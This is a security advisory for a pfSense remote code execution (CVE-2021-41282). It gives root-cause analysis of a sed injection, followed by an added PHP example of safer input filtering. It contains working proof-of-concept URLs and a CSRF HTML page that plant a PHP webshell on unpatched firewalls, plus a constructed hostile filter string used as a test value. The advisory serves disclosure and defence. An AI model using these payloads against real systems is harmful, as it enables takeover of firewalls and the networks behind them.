Shielder - Remote Code Execution in pfSense <= 2.5.2
<!doctype html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=description content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta name=Copyright content="Copyright © Shielder"><meta property="og:title" content="Shielder - Remote Code Execution in pfSense <= 2.5.2"><meta property="og:type" content="article"><meta property="og:url" content="https://www.shielder.com/advisories/pfsense-remote-command-execution/"><meta property="og:image" content="https://www.shielder.com//img/advisory.png"><meta property="og:image:type" content="image/png"><meta property="og:image:width" content="225"><meta property="og:image:height" content="225"><meta property="og:image:alt" content="advisory"><meta property="og:locale" content="en_US"><meta property="og:description" content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta property="og:site_name" content="Shielder"><meta property="fb:app_id" content="1651492201761174"><meta name=twitter:card content="summary"><meta name=twitter:site content="@ShielderSec"><meta name=twitter:creator content="@ShielderSec"><meta name=twitter:title content="Shielder - Remote Code Execution in pfSense <= 2.5.2"><meta name=twitter:description content="pfSense <= 2.5.2 allows authenticated users to inject arbitrary sed-specific code, which leads to an Arbitrary File Write, resulting in a Remote Code Execution. 
The vulnerability is also exploitable through a Cross-Site Request Forgery."><meta name=twitter:image content="https://www.shielder.com//img/advisory.png"><link rel=apple-touch-icon sizes=57x57 href=https://www.shielder.com/favicon/apple-touch-icon-57x57.png><link rel=apple-touch-icon sizes=60x60 href=https://www.shielder.com/favicon/apple-touch-icon-60x60.png><link rel=apple-touch-icon sizes=72x72 href=https://www.shielder.com/favicon/apple-touch-icon-72x72.png><link rel=apple-touch-icon sizes=76x76 href=https://www.shielder.com/favicon/apple-touch-icon-76x76.png><link rel=apple-touch-icon sizes=114x114 href=https://www.shielder.com/favicon/apple-touch-icon-114x114.png><link rel=apple-touch-icon sizes=120x120 href=https://www.shielder.com/favicon/apple-touch-icon-120x120.png><link rel=apple-touch-icon sizes=144x144 href=https://www.shielder.com/favicon/apple-touch-icon-144x144.png><link rel=apple-touch-icon sizes=152x152 href=https://www.shielder.com/favicon/apple-touch-icon-152x152.png><link rel=apple-touch-icon sizes=167x167 href=https://www.shielder.com/favicon/apple-touch-icon-167x167.png><link rel=apple-touch-icon sizes=180x180 href=https://www.shielder.com/favicon/apple-touch-icon-180x180.png><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-16x16.png sizes=16x16><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-96x96.png sizes=96x96><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-160x160.png sizes=160x160><link rel=icon type=image/png href=https://www.shielder.com/favicon/favicon-192x192.png sizes=192x192><link rel="shortcut icon" href=https://www.shielder.com/favicon/favicon.ico><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-regular-400.woff2 as=font type=font/woff2 crossorigin><link rel=preload 
href=https://www.shielder.com/fontawesome/webfonts/fa-solid-900.woff2 as=font type=font/woff2 crossorigin><link rel=preload href=https://www.shielder.com/fontawesome/webfonts/fa-brands-400.woff2 as=font type=font/woff2 crossorigin><title>Shielder - Remote Code Execution in pfSense <= 2.5.2 </title><link rel=stylesheet defer href=https://www.shielder.com/css/bootstrap.min.css><link rel=stylesheet defer href=https://www.shielder.com/css/style.css><link rel=stylesheet async href=https://www.shielder.com/fontawesome/css/all.min.css><link rel=stylesheet async href=https://www.shielder.com/css/dracula.css><link rel=alternate type=application/rss+xml title="Shielder Blog" href=https://www.shielder.com/blog/index.xml><link rel=alternate type=application/rss+xml title="Shielder Advisories" href=https://www.shielder.com/advisories/index.xml></head><body><section id=single-advisory class="bg-primary text-white"><div class=container><div class=row><div class="col-12 col-lg-8"><h1 id=remote-code-execution-in-pfsense--252>Remote Code Execution in pfSense &lt;= 2.5.2</h1><h2 id=summary>Summary</h2><p>pfSense allows authenticated users to get information about the routes set in the firewall. The information is retrieved by executing the <code>netstat</code> utility, and its output is then parsed via the <code>sed</code> utility. While the common prevention patterns for command injection (i.e. the use of the <code>escapeshellarg</code> function for the arguments) are in use, it is still possible to inject <code>sed</code>-specific code and write an arbitrary file in an arbitrary location. 
This vulnerability could also be exploited pre-authentication, as the vulnerable endpoint is also vulnerable to Cross-Site Request Forgery (CSRF).</p><h2 id=product-description-from-vendor>Product Description (from vendor)</h2><p>pfSense® Plus software is the world’s most trusted firewall. The software has garnered the respect and adoration of users worldwide - installed well over three million times. Made possible by open source technology. Made into a robust, reliable, dependable product by Netgate.</p><h2 id=cves>CVE(s)</h2><ul><li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41282" target=_blank rel="noopener noreferrer">CVE-2021-41282</a></li></ul><h2 id=details>Details</h2><h3 id=root-cause-analysis>Root Cause Analysis</h3><p>When showing the routes set in the firewall, pfSense executes the <code>sed</code> utility with some user-controllable input.<br><code>sed</code> - a stream editor - is a powerful utility for performing text transformations, and it has many commands that can be passed, semicolon-separated, in a single command-line argument. The ability to add multiple commands in one argument is the key to this vulnerability.</p><p>Before diving into the exploitation details, it is important to note that pfSense is based on FreeBSD, so all the GNU-specific arguments of <code>sed</code> (e.g. 
the <code>e</code>/<code>exec</code> argument, which could be used to run a system command) are not available.</p><p>An excerpt of the <a href=https://github.com/pfsense/pfsense/blob/a7086b04cae21ca742fdeefd1019ee1401b6dded/src/usr/local/www/diag_routes.php#L35-L65 target=_blank rel="noopener noreferrer">vulnerable code</a> follows:</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre tabindex=0 class=chroma><code class=language-php data-lang=php><span class=line><span class=cl><span class=mi>35</span> <span class=k>if</span> <span class=p>(</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'isAjax'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>36</span> <span class=k>require_once</span><span class=p>(</span><span class=s1>'auth_check.inc'</span><span class=p>);</span> </span></span><span class=line><span class=cl><span class=mi>37</span> </span></span><span class=line><span class=cl><span class=mi>38</span> <span
class=nv>$netstat</span> <span class=o>=</span> <span class=s2>"/usr/bin/netstat -rW"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>39</span> <span class=k>if</span> <span class=p>(</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'IPv6'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>40</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -f inet6"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>41</span> <span class=k>echo</span> <span class=s2>"IPv6</span><span class=se>\n</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>42</span> <span class=p>}</span> <span class=k>else</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>43</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -f inet"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>44</span> <span class=k>echo</span> <span class=s2>"IPv4</span><span class=se>\n</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>45</span> </span></span><span class=line><span class=cl><span class=mi>46</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>47</span> <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'resolve'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>48</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" -n"</span><span class=p>;</span> </span></span><span 
class=line><span class=cl><span class=mi>49</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>50</span> </span></span><span class=line><span class=cl><span class=mi>51</span> <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=k>empty</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'filter'</span><span class=p>]))</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>52</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/sed -e "</span> <span class=o>.</span> <span class=nx>escapeshellarg</span><span class=p>(</span><span class=s2>"1,3d; 5,</span><span class=se>\$</span><span class=s2> { /"</span> <span class=o>.</span> <span class=nx>htmlspecialchars</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'filter'</span><span class=p>])</span> <span class=o>.</span> <span class=s2>"/!d; };"</span><span class=p>);</span> </span></span><span class=line><span class=cl><span class=mi>53</span> <span class=p>}</span> <span class=k>else</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>54</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/sed -e '1,3d'"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>55</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>56</span> </span></span><span class=line><span class=cl><span class=mi>57</span> <span class=k>if</span> <span class=p>(</span><span class=nx>is_numeric</span><span class=p>(</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>])</span> <span class=o>&&</span> <span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span> <span class=o>></span> 
<span class=mi>0</span><span class=p>)</span> <span class=p>{</span> </span></span><span class=line><span class=cl><span class=mi>58</span> <span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span><span class=o>++</span><span class=p>;</span> <span class=c1>// Account for the header line </span></span></span><span class=line><span class=cl><span class=c1></span><span class=mi>59</span> <span class=nv>$netstat</span> <span class=o>.=</span> <span class=s2>" | /usr/bin/head -n </span><span class=si>{</span><span class=nv>$_REQUEST</span><span class=p>[</span><span class=s1>'limit'</span><span class=p>]</span><span class=si>}</span><span class=s2>"</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>60</span> <span class=p>}</span> </span></span><span class=line><span class=cl><span class=mi>61</span> </span></span><span class=line><span class=cl><span class=mi>62</span> <span class=k>echo</span> <span class=nx>htmlspecialchars_decode</span><span class=p>(</span><span class=nx>shell_exec</span><span class=p>(</span><span class=nv>$netstat</span><span class=p>));</span> </span></span><span class=line><span class=cl><span class=mi>63</span> </span></span><span class=line><span class=cl><span class=mi>64</span> <span class=k>exit</span><span class=p>;</span> </span></span><span class=line><span class=cl><span class=mi>65</span> <span class=p>}</span> </span></span></code></pre></td></tr></table></div></div><p>At lines 51-52 it can be seen that, if the request contains a <code>filter</code> parameter, its HTML special characters are converted to their HTML entities. 
Then the input is prefixed and suffixed by some hard-coded <code>sed</code> syntax, and finally everything is escaped by the <a href=https://www.php.net/manual/en/function.escapeshellarg.php target=_blank rel="noopener noreferrer"><code>escapeshellarg</code></a> function, which prevents sub-commands or other arguments from being injected. At line 62 the command is finally executed.</p><p>As mentioned before, it is possible to inject arbitrary <code>sed</code> syntax, the only limitation being that the input is encoded via the <a href=https://www.php.net/manual/en/function.htmlspecialchars.php target=_blank rel="noopener noreferrer"><code>htmlspecialchars</code></a> function. This makes it possible to use the <code>s/match/replace/</code> command to replace part of the <code>netstat</code> output with an arbitrary string and the <code>w /path/to/file</code> command to write the output of the <code>sed</code> command to an arbitrary location.</p><p>Putting everything together, an attacker could set the filter parameter to the following string: <code>.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23</code>, which results in the following command being run:</p><pre tabindex=0><code>/usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3d; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php #/!d; };' </code></pre><p>As the <code>netstat</code> utility always outputs the <code>Destination</code> string, it was chosen to be replaced with <code>&lt;?php system($_GET["a"]);?&gt;</code>, and the output is then written to <code>/usr/local/www/a.php</code>.</p><h3 id=proof-of-concept>Proof of Concept</h3><ol><li>Log in to pfSense</li><li>Visit the following URL by replacing <code>&lt;target&gt;</code> with the IP address / domain of the target pfSense instance: 
<code>http://&lt;target&gt;/diag_routes.php?isAjax=1&amp;filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23</code></li><li>Visit the following URL by replacing <code>&lt;target&gt;</code> with the IP address / domain of the target pfSense instance and notice that the <code>id</code> command has been executed: <code>http://&lt;target&gt;/a.php?a=id</code></li></ol><h3 id=impact>Impact</h3><p>An authenticated attacker could write an arbitrary file to the pfSense disk. This can be abused to write a webshell to execute arbitrary code / commands.</p><p>It should be noted that, due to a lack of Cross-Site Request Forgery (CSRF) protections for the vulnerable endpoint, it is possible for an attacker to trick an authenticated admin into visiting a malicious website to exploit the vulnerability through the victim’s session/browser. More details are available in the Cross-Site Request Forgery advisory.</p><p>A proof of concept to exploit the vulnerability through the CSRF follows:</p><ol><li>Log in to pfSense</li><li>Create an HTML file with the following content by replacing <code>&lt;target&gt;</code> with the IP address / domain of the target pfSense instance:</li></ol><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre tabindex=0 class=chroma><code class=language-html data-lang=html><span class=line><span class=cl><span class=p>&lt;</span><span class=nt>meta</span> <span class=na>name</span><span class=o>=</span><span class=s>"referrer"</span> <span class=na>content</span><span class=o>=</span><span class=s>"no-referrer"</span><span class=p>&gt;</span> </span></span><span class=line><span class=cl><span class=p>&lt;</span><span class=nt>script</span><span class=p>&gt;</span> </span></span><span class=line><span class=cl><span class=nb>window</span><span
class=p>.</span><span class=nx>location</span> <span class=o>=</span> <span class=s2>"http://&lt;target&gt;/diag_routes.php?isAjax=1&amp;filter=.*/!d;};s/Destination/\\x3cscript\\x3eif\\x28location.pathname\\x21\\x3d\\x27\\x2fa.php\\x27\\x29\\x7blocation\\x3d\\x27\\x2fa.php\\x3fa\\x3did\\x27\\x7d\\x3c\\x2fscript\\x3e\\x3c\\x3fphp+system($_GET[\\x22a\\x22])\\x3b\\x3f\\x3e/;w+/usr/local/www/a.php%0a%23"</span> </span></span><span class=line><span class=cl><span class=p>&lt;/</span><span class=nt>script</span><span class=p>&gt;</span> </span></span></code></pre></td></tr></table></div></div><ol start=3><li>Visit the following URL by replacing <code>&lt;target&gt;</code> with the IP address / domain of the target pfSense instance and notice the 404 error: <code>http://&lt;target&gt;/a.php?a=id</code></li><li>Host the HTML page created at step 2 on a webserver and visit it in the same browser used for the other steps</li><li>Notice that the Arbitrary File Write has been exploited to create a webshell in <code>/usr/local/www/a.php</code> and the victim is redirected to the webshell (<code>http://&lt;target&gt;/a.php?a=id</code>) to execute the <code>id</code> command</li></ol><h3 id=remediation>Remediation</h3><p>Upgrade pfSense CE to version 2.6.0 or pfSense Plus to version 22.01.</p><h2 id=disclosure-timeline>Disclosure Timeline</h2><ul><li>12/08/2021: Submission to <a href=mailto:security@netgate.com>security@netgate.com</a></li><li>13/08/2021: pfSense published the fix for the RCE on GitHub: <a href=https://github.com/pfsense/pfsense/commit/72ea2b69cc111d4bc8ebf1ccf1e1529923c5b88a target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/72ea2b69cc111d4bc8ebf1ccf1e1529923c5b88a</a></li><li>16/08/2021: Shielder reported a ReDoS in the implemented fix and the lack of a fix for the CSRF</li><li>16/08/2021: pfSense published the first attempt to fix the ReDoS and the fix for the CSRF on GitHub: <a href=https://github.com/pfsense/pfsense/commit/57a737f172b7baaa6ae0f23e8aef2f93ad851054 
target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/57a737f172b7baaa6ae0f23e8aef2f93ad851054</a></li><li>17/08/2021: Shielder reported a bypass for the ReDoS fix</li><li>17/08/2021: pfSense published the second attempt to fix the ReDoS on GitHub: <a href=https://github.com/pfsense/pfsense/commit/8cd3f92f2443a6f0e4b7964a9532f761f808a0c6 target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/8cd3f92f2443a6f0e4b7964a9532f761f808a0c6</a></li><li>17/08/2021: Shielder reported yet-another-bypass™️ for the ReDoS fix</li><li>18/08/2021: pfSense published the final fix for the ReDoS on GitHub: <a href=https://github.com/pfsense/pfsense/commit/cf757a8094762ede47861fc073eaba06355c6bfc target=_blank rel="noopener noreferrer">https://github.com/pfsense/pfsense/commit/cf757a8094762ede47861fc073eaba06355c6bfc</a></li><li>15/09/2021: Shielder requested the CVE</li><li>06/10/2021: Shielder asked for an update about the publication time of the fixed version</li><li>06/10/2021: pfSense shared the ETA for the update - Jan 2022</li><li>14/02/2022: pfSense published the fixed version</li><li>23/02/2022: Shielder’s advisory is made public</li></ul><h2 id=credits>Credits</h2><ul><li>Abdel Adim `<a href=https://twitter.com/smaury92 target=_blank rel="noopener noreferrer">smaury</a>` Oisfi of Shielder</li></ul><p class="font-weight-bold smaller mt-4">This advisory was first published on https://www.shielder.com/advisories/pfsense-remote-command-execution/</p></div><div class="col-12 col-lg-3 offset-lg-1 order-first order-lg-last mb-5 mb-lg-0"><div class=row><div class="col-12 my-4"><p class=mb-0><i class="fas fa-folder text-primary pr-2"></i> <span class="badge badge-pill border text-muted border-primary text-uppercase mb-2 mr-1"><a class="smaller text-decoration-none text-muted" href=/types/advisory>Advisory</a></span></p></div><div class="col-12 mb-4"><p class="text-muted text-uppercase smaller mb-1">Date</p><p class="font-weight-bold 
text-uppercase mb-0">23 February 2022</p></div></div></div></div></div></section><script 
src=https://www.shielder.com/js/jquery.min.js></script><script src=https://www.shielder.com/js/app.js></script><script src=https://www.shielder.com/js/bootstrap.bundle.min.js></script></body></html>
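The root cause described in this advisory is that escapeshellarg stops the shell from interpreting the filter, but sed still parses it as script text. As an added example (not pfSense code and not the vendor's fix; the function names, the allowlist and the sample netstat output are assumptions), the PHP below applies the filter in PHP so request data never reaches a second interpreter, and shows a strict allowlist for code that must keep calling sed:

```php
<?php
declare(strict_types=1);

// Added example, not pfSense code. Function names, the allowlist and the
// sample data are assumptions made for illustration.

/** Build the netstat command from fixed strings only (flags as in the excerpt). */
function netstat_command(bool $ipv6, bool $resolve): string
{
    return '/usr/bin/netstat -rW -f ' . ($ipv6 ? 'inet6' : 'inet') . ($resolve ? '' : ' -n');
}

/**
 * Apply the route filter in PHP instead of sed. Mirrors the intent of
 * sed '1,3d; 5,$ { /filter/!d; }': drop the three preamble lines, keep the
 * column header, keep only rows that contain $filter. The filter is compared
 * as a literal, case-insensitive substring, so no character in it has syntax.
 */
function filter_routes(string $netstat_output, string $filter, int $limit = 0): string
{
    $lines  = array_slice(explode("\n", rtrim($netstat_output, "\n")), 3);
    $header = array_shift($lines) ?? '';
    if ($filter !== '') {
        $lines = array_filter($lines, fn(string $row): bool => stripos($row, $filter) !== false);
    }
    if ($limit > 0) {
        $lines = array_slice($lines, 0, $limit);
    }
    return implode("\n", array_merge([$header], $lines)) . "\n";
}

/**
 * Allowlist for code that must keep passing the value to sed: only characters
 * seen in addresses, host names and interface names. '/', ';', braces,
 * backslashes, whitespace and newlines are excluded, so the value can neither
 * close the /regex/ address nor start another sed command.
 */
function is_safe_route_filter(string $filter): bool
{
    return preg_match('/\A[A-Za-z0-9.:_%-]{1,64}\z/', $filter) === 1;
}

/** Request handling in the shape of the excerpt, with both controls applied. */
function handle_request(array $request, string $netstat_output): string
{
    $filter = $request['filter'] ?? '';
    // Reject array-valued parameters (filter[]=x) and anything off the allowlist.
    if (!is_string($filter) || ($filter !== '' && !is_safe_route_filter($filter))) {
        return "Invalid filter\n";
    }
    // Accept the limit only if it parses as an integer in a sane range.
    $limit = filter_var($request['limit'] ?? 0, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10000]]);
    return filter_routes($netstat_output, $filter, $limit === false ? 0 : $limit);
}

// Constructed sample of `netstat -rW -f inet -n` output (not captured from a host).
$sample = implode("\n", [
    'Routing tables',
    '',
    'Internet:',
    'Destination        Gateway            Flags     Netif Expire',
    'default            192.0.2.1          UGS         em0',
    '127.0.0.1          link#2             UH          lo0',
    '192.0.2.0/24       link#1             U           em0',
]) . "\n";

// Constructed value with the shape described in the advisory: it closes the
// regex address and appends a sed "w" command. The path is a placeholder.
$hostile = ".*/!d;};w /tmp/constructed-placeholder\n#";

// On a live system the second argument would be shell_exec(netstat_command(false, false)).
echo handle_request(['filter' => 'em0', 'limit' => '1'], $sample);
echo handle_request(['filter' => $hostile], $sample);
echo filter_routes($sample, $hostile);
```

With the constructed inputs, the hostile value is rejected by the allowlist; passed straight to filter_routes it is only a substring that matches no row, so just the header line comes back.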